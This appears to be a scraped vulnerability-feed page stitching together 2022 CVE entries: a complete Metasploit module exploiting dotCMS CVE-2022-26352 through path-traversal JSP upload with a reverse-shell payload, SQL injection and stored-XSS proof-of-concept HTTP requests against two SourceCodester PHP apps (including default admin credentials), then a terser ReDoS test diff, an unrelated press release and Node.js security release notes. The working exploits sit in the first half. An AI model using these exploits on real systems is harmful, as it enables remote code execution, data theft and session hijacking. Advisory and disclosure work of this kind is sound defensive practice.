An issue was discovered in the ContentResource API in dotCMS 3.0 through 22.02. Attackers can craft a multipart form request to post a file whose filename is not initially sanitized. This allows directory traversal, in which the file is saved outside of the intended storage location. If anonymous content creation is enabled, this allows an unauthenticated attacker to upload an executable file, such as a .jsp file, that can lead to remote code execution.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'DotCMS RCE via Arbitrary File Upload.',        'Description' => %q{          When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the          file down in a temp directory.  In the case of this vulnerability, dotCMS does not sanitize the filename          passed in via the multipart request header and thus does not sanitize the temp file's name.  This allows a          specially crafted request to POST files to dotCMS via the ContentResource (POST /api/content)  that get          written outside of the dotCMS temp directory.  In the case of this exploit, an attacker can upload a special          .jsp file to the webapp/ROOT directory of dotCMS which can allow for remote code execution.        },        'Author' => [          'Shubham Shah',  # Discovery and analysis          'Hussein Daher', # Discovery and analysis          'jheysel-r7'     # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2022-26352'],          ['URL', 'https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/']        ],        'Privileged' => false,        'Platform' => %w[linux win],        'Targets' => [          [            'Java Linux',            {              'Arch' => ARCH_JAVA,              'Platform' => 'linux'            }          ],          [            'Java Windows',            {              'Arch' => ARCH_JAVA,              'Platform' => 'win'            }          ]        ],        'DisclosureDate' => '2022-05-03',        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true,          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options([      Opt::RPORT(8443),      OptString.new('TARGETURI', [true, 'Base path', '/'])    ])  end  def check    test_content = Rex::Text.rand_text_alpha(10)    test_file = "#{test_content}.jsp"    test_path = "../../#{test_file}"    uuid = Faker::Internet.uuid    jsp = <<~EOS      <%@ page import=\"java.io.File\" %>      <%        File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{test_file}");        jsp.delete();      %>      #{uuid}    EOS    vars_form_data = [      {        'name' => 'name',        'data' => jsp,        'encoding' => nil,        'filename' => test_path,        'mime_type' => 'text/plain'      }    ]    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/api/content/'),      'vars_form_data' => vars_form_data    )    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, test_file.to_s)    )    if res && res.body.include?(uuid)      return Exploit::CheckCode::Vulnerable    end    Exploit::CheckCode::Safe  end  def write_jsp_payload    jsp_path = "../../#{jsp_filename}"    print_status('Writing JSP payload')    vars_form_data = [      {        'name' => 'name',        'data' => payload.encoded,        'encoding' => nil,        'filename' => jsp_path,        'mime_type' => 'text/plain'      }    ]    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/api/content/'),      'vars_form_data' => vars_form_data    )    unless res&.code == 500      fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')    end    register_file_for_cleanup("../webapps/ROOT/#{jsp_filename}")    print_good('Successfully wrote JSP payload')  end  def execute_jsp_payload    jsp_uri = normalize_uri(target_uri.path, jsp_filename)    print_status('Executing JSP payload')    res = send_request_cgi(      'method' => 'GET',      'uri' => jsp_uri    )    unless res&.code == 200      fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')    end    print_good('Successfully executed JSP payload')  end  def exploit    write_jsp_payload    execute_jsp_payload  end  def jsp_filename    @jsp_filename ||= "#{rand_text_alphanumeric(8..16)}.jsp"  endend

CVE-2022-26352: dotCMS Shell Upload ≈ Packet Storm

All versions of package angular are vulnerable to Cross-site Scripting (XSS) due to insecure page caching in the Internet Explorer browser, which allows interpolation of <textarea> elements.

NPM package [angular](https://www.npmjs.com/package/angular) is deprecated. Those who want to receive security updates should use the actively maintained package [@angular/core](https://www.npmjs.com/package/@angular/core).

**Angular (deprecated package) Cross-site Scripting**

Moderate severity GitHub Reviewed Published Jul 16, 2022 • Updated Jul 20, 2022

GHSA-prc3-vjfx-vhm9: Angular (deprecated package) Cross-site Scripting

The package terser before 4.8.1, from 5.0.0 and before 5.14.2 are vulnerable to Regular Expression Denial of Service (ReDoS) due to insecure usage of regular expressions.



@@ -30,10 +30,10 @@ regexp\_2: { unsafe: true, } input: { console.log(JSON.stringify("COMPASS? Overpass.".match(new RegExp("(\[Sap\]+)", "ig")))); console.log(JSON.stringify("COMPASS? Overpass.".match(new RegExp("(pass)", "ig")))); } expect: { console.log(JSON.stringify("COMPASS? Overpass.".match(/(\[Sap\]+)/gi))); console.log(JSON.stringify("COMPASS? Overpass.".match(/(pass)/gi))); } expect\_stdout: '\["PASS","pass"\]' } @@ -44,10 +44,10 @@ unsafe\_slashes: { unsafe: true } input: { console.log(new RegExp("^https://")) console.log(new RegExp("^https//")) } expect: { console.log(/^https:\\/\\//) console.log(/^https\\/\\//) } } unsafe\_nul\_byte: { @@ -75,3 +75,16 @@ inline\_script: { } expect\_exact: '/\* <\\\\/script> \*/\\n/\[<\\\\/script>\]/;' }  
regexp\_no\_ddos: { options \= { unsafe: true, evaluate: true } input: { console.log(/(b+)b+/.test("bbb")) console.log(RegExp("(b+)b+").test("bbb")) } expect: { console.log(/(b+)b+/.test("bbb")) console.log(RegExp("(b+)b+").test("bbb")) } expect\_stdout: \["true", "true"\] }

CVE-2022-25858: fix potential regexp DDOS · terser/terser@a4da734

# Impact
Due to insufficient class name validation in GrapeJS library it's possible to add executable JS code in class name through Selector Manager

# Relates to
 - [https://github.com/artf/grapesjs/issues/4411](https://github.com/artf/grapesjs/issues/4411)

# Patch
Update GrapeJS dependency to >=[v0.19.5](https://github.com/artf/grapesjs/releases/tag/v0.19.5)


**OroCommerce vulnerable to XSS when adding class name to Selector Manager on pages that use GrapeJS editor**

Moderate severity GitHub Reviewed Published Jul 15, 2022 in oroinc/orocommerce • Updated Jul 15, 2022

GHSA-6f85-3f8q-qc94: OroCommerce vulnerable to XSS when adding class name to Selector Manager on pages that use GrapeJS editor

Product Show Room Site v1.0 is vulnerable to SQL Injection via /psrs/classes/Master.php?f=delete_product.

Permalink

Cannot retrieve contributors at this time

**Product Show Room Site v1.0 by oretnom23 has SQL injection**

Vul\_Author: XuBoyu

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html

Vulnerability File: /psrs/classes/Master.php?f=delete\_product

Vulnerability location: /psrs/classes/Master.php?f=delete\_product, id

Current database name: psrs\_db ,length is 7

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /psrs/classes/Master.php?f\=delete\_product HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/psrs/admin/?page=products
Content-Length: 65
Cookie: PHPSESSID=7g6mvmuq5m1o1cvqrhprll4jr1
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-32416: bug_report/SQLi-1.md at main · Estbonxby/bug_report

Fast Food Ordering System v1.0 was discovered to contain a persistent cross-site scripting (XSS) vulnerability via the component /ffos/classes/Master.php?f=save_category.

    ## Title: Fast Food Ordering System 1.0 Stored Cross-Site Scripting## Author: Ashish Kumar## Date: 05.31.2022## Vendor: https://www.sourcecodester.com/users/tips23## Software:https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html## Reference:https://medium.com/@cyberthoth/fast-food-ordering-system-1-0-cross-site-scripting-7927f4b1edd6#Description：#The Line 255 of Master.php sends unvalidated data to a web browser, whichcan result in the browser executing malicious code.#echo $Master->save_category();#PoC：POST /ffos/classes/Master.php?f=save_category HTTP/1.1Host: localhostContent-Length: 480sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data;boundary=----WebKitFormBoundarySmYVeqOBMhcSziZMX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/ffos/admin/?page=categoriesAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=junl7tbvb7hvrdeq776aislbcjConnection: close------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="id"10------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="name"XSS------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="description"Testing XSS "><img src="" onerror="alert(document.cookie)">------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="status"1------WebKitFormBoundarySmYVeqOBMhcSziZM--

CVE-2022-32318: Fast Food Ordering System 1.0 Cross Site Scripting ≈ Packet Storm

Developers can now rest assured that the code they are using, as well as their GitHub accounts, are safe.

TEL AVIV, Israel , July 14, 2022 /PRNewswire/ -- Scribe Security, a leading software supply chain security solutions provider, announced today the release of Scribe Integrity, a code integrity validator that authenticates open-source and proprietary source code, and an integral building block of its platform solving the software supply chain security challenge. Scribe Integrity provides developers with an added layer of visibility, allowing developers peace of mind that the code they are using is safe. Scribe is simultaneously introducing its open-source Github security project, GitGat.

In 2021, software supply chain (SSC) attacks more than tripled, with recent attacks on SolarWinds, CodeCov, and Log4Shell underscoring the growing risk of such attacks to enterprises.

DevSecOps and security teams often focus on software vulnerabilities, overlooking the risk of tampering with software in the build process. Scribe bridges this gap in a practical manner by providing a convenient work tool that automatically reports integrity validation within a trusted software bill of materials SBOM.

Scribe leverages the principle of 'hash everything, sign everything', utilizing open-source intelligence that it collects on open-source dependencies. In this first release, Scribe's solution addresses the widely used Node.js and the popular npm package manager, which have recently suffered from a multitude of attacks.

Scribe's additional release, GitGat, is a Policy-as-Code tool, utilizing Open Policy Agent (OPA), an open source project, that addresses users' security posture. GitGat allows users to periodically run reports to gain insight into the changing security landscape of the organization. As GitGat evolves, it will cover more parts of the CI/CD toolchains.

"As software supply chains are an overlooked corner of the cyber world, they have become an increasingly attractive attack vector for hackers," said Scribe CEO and Co-founder, Rubi Arbel. "We are excited to be introducing a developer-first, practical tool that will give DevSecOps and security practitioners the assurance they need to trust the software they build and use."

**About Scribe**

Founded by cyber security and cryptography experts, Scribe Security develops a novel software supply chain security solution to increase trust in software products. For more information visit https://scribesecurity.com/

Scribe Security Releases Code Integrity Validator Alongside Github Security Open Source Project

The llhttp parser in the http module in Node.js does not strictly use the CRLF sequence to delimit HTTP requests. This can lead to HTTP Request Smuggling (HRS).

CVE-2022-32214

The llhttp parser in the http module in Node v17.6.0 does not correctly handle multi-line Transfer-Encoding headers. This can lead to HTTP Request Smuggling (HRS).

Updates are now available for the v18.x, v16.x, and v14.x Node.js release lines for the following issues.

The llhttp parser in the http module does not correctly parse and validate Transfer-Encoding headers. This can lead to HTTP Request Smuggling (HRS).

More details will be available at CVE-2022-32213 after publication.

Thank you to Zeyu Zhang (@zeyu2001) for reporting this vulnerability.

Impacts:

*   All versions of the 18.x, 16.x, and 14.x releases lines.
*   llhttp v6.0.7 and llhttp v2.1.5 contains the fixes that were updated inside Node.js

The llhttp parser in the http module does not strictly use the CRLF sequence to delimit HTTP requests. This can lead to HTTP Request Smuggling (HRS).

More details will be available at CVE-2022-32214 after publication.

Thank you to Zeyu Zhang (@zeyu2001) for reporting this vulnerability.

Impacts:

*   All versions of the 18.x, 16.x, and 14.x releases lines.
*   llhttp v6.0.7 and llhttp v2.1.5 contains the fixes that were updated inside Node.js

The llhttp parser in the http module does not correctly handle multi-line Transfer-Encoding headers. This can lead to HTTP Request Smuggling (HRS).

More details will be available at CVE-2022-32215 after publication.

Thank you to Zeyu Zhang (@zeyu2001) for reporting this vulnerability.

Impacts:

*   All versions of the 18.x, 16.x, and 14.x releases lines.
*   llhttp v6.0.7 and llhttp v2.1.5 contains the fixes that were updated inside Node.js

The IsAllowedHost check can easily be bypassed because IsIPAddress does not properly check if an IP address is invalid or not. When an invalid IPv4 address is provided (for instance 10.0.2.555 is provided), browsers (such as Firefox) will make DNS requests to the DNS server, providing a vector for an attacker-controlled DNS server or a MITM who can spoof DNS responses to perform a rebinding attack and hence connect to the WebSocket debugger, allowing for arbitrary code execution. This is a bypass of CVE-2021-22884.

More details will be available at CVE-2022-32212 after publication.

Thank you to Axel Chong for reporting this vulnerability.

Impacts:

*   All versions of the 18.x, 16.x, and 14.x releases lines.

This vulnerability can be exploited if the victim has the following dependencies on Windows machine:

*   OpenSSL has been installed and “C:\\Program Files\\Common Files\\SSL\\openssl.cnf” exists.

Whenever the above conditions are present, node.exe will search for providers.dll in the current user directory. After that, node.exe will try to search for providers.dll by the DLL Search Order in Windows.

It is possible for an attacker to place the malicious file providers.dll under a variety of paths and exploit this vulnerability.

More details will be available at CVE-2022-32223 after publication.

Thank you to Yakir Kadkoda from Aqua Security for reporting this vulnerability.

Impacts:

*   All versions of the 16.x, and 14.x releases lines.

Note:

*   This is a breaking change that has been made to the v14.x, v16.x, and v18.x releases lines.

Node.js can use an OpenSSL configuration file by specifying the environment variable OPENSSL_CONF, or using the command line option --openssl-conf, and if none of those are specified will default to reading the default OpenSSL configuration file openssl.cnf. **Node.js will only read a section that is by default named nodejs_conf**.

If your installation was using the default openssl.cnf file and is affected by this breaking change you can fall back to the previous behavior by:

*   Adding --openssl-shared-config to the command line (Node.js 18.5.0 only); or
*   Creating a new nodejs_conf section in that file and copying the contents of the default section into the new nodejs_conf section.

When Node.js starts on linux based systems, it attempts to read /home/iojs/build/ws/out/Release/obj.target/deps/openssl/openssl.cnf, which ordinarily doesn't exist. On some shared systems an attacker may be able create this file and therefore affect the default OpenSSL configuration for other users.

Thank you to Michael Scovetta from the OpenSSF Alpha-Omega project for reporting this vulnerability.

Impacts:

*   Node.js 18.x

AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed.

Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected.

Impacts:

*   All versions of the 18.x, 16.x, and 14.x releases lines.

**Downloads and release details**

*   Node.js v14.20.0 (LTS)
*   Node.js v16.16.0 (LTS)
*   Node.js v18.5.0 (Current)

The Node.js Security Releases will be available on, or shortly after, Thursday, July 7th, 2022.

With respect to the vulnerabilities in the OpenSSL Security releases of Jul 5th 2022 affects Node.js v18.x, v16.x, and v14.x.

*   Node.js is affected by **one** MODERATE vulnerability on Windows 32-Bit x86.

The security release will be delayed so that we can incorporate the the updated OpenSSL versions. We will post another update once we have an updated target for the release date.

Our assessment of the security advisory is:

This vulnerability affects OpenSSL 3.0.4 users. However, Node.js has not shipped any version that used OpenSSL 3.0.4. Therefore, Node.js is not affected.

This vulnerability affects Windows 32-Bit x86 users using AES OCB encryption. The serverity is MODERATE.

The OpenSSL versions 1.1.1q and 3.0.5 will be released July, 5th 2022. The announcement can be found here: https://mta.openssl.org/pipermail/openssl-announce/2022-July/000229.html

The Node.js team will evaluate the OpenSSL changes when they are available and then announce the new target date by Thursday or earlier.

The Node.js project will release new versions of the 14.x, 16.x, and 18.x releases lines on or shortly after Tuesday, July 5th, 2022 in order to address:

*   Three medium severity issues.
*   Two high severity issues.

The 18.x release line of Node.js is vulnerable to three medium severity issues and one high severity issues.

The 16.x release line of Node.js is vulnerable to three medium severity issues and two high severity issues.

The 14.x release line of Node.js is vulnerable to three medium severity issues and two high severity issues.

Releases will be available on, or shortly after, Tuesday, July 5th, 2022.

However, when details of the OpenSSL defects are released on the 5th, our team will be making a more detailed assessment on the likely severity for Node.js users.

The OpenSSL release may delay the Node.js release date. See OpenSSL Security Release

Please monitor the **nodejs-sec** Google Group for updates, including a decision within 24 hours after the OpenSSL release regarding release timing, and full details of the defects upon eventual release: https://groups.google.com/forum/#!forum/nodejs-sec

The current Node.js security policy can be found at https://nodejs.org/en/security/. Please follow the process outlined in https://github.com/nodejs/node/blob/main/SECURITY.md if you wish to report a vulnerability in Node.js.

Subscribe to the low-volume announcement-only nodejs-sec mailing list at https://groups.google.com/forum/#!forum/nodejs-sec to stay up to date on security vulnerabilities and security-related releases of Node.js and the projects maintained in the nodejs GitHub organization.

CVE-2022-32215: July 7th 2022 Security Releases | Node.js

A OS Command Injection vulnerability exists in Node.js versions <14.20.0, <16.20.0, <18.5.0 due to an insufficient IsAllowedHost check that can easily be bypassed because IsIPAddress does not properly check if an IP address is invalid before making DBS requests allowing rebinding attacks.

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

The Node.js inspector, in 6.x and later is vulnerable to a DNS rebinding attack which could be exploited to perform remote code execution. An attack is possible from malicious websites open in a web browser on the same computer, or another computer with network access to the computer running the Node.js process. A malicious website could use a DNS rebinding attack to trick the web browser to bypass same-origin-policy checks and to allow HTTP connections to localhost or to hosts on the local network. If a Node.js process with the debug port active is running on localhost or on a host on the local network, the malicious website could connect to it as a debugger, and get full code execution access.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

*   CONFIRM:https://nodejs.org/en/blog/vulnerability/march-2018-security-releases/
*   URL:https://nodejs.org/en/blog/vulnerability/march-2018-security-releases/
*   CONFIRM:https://support.f5.com/csp/article/K63025104?utm\_source=f5support&amp;utm\_medium=RSS
*   URL:https://support.f5.com/csp/article/K63025104?utm\_source=f5support&amp;utm\_medium=RSS
*   MISC:https://www.oracle.com//security-alerts/cpujul2021.html
*   URL:https://www.oracle.com//security-alerts/cpujul2021.html

Assigning CNA

Node.js

Date Record Created

**20180215**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20180215)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

Tag

#js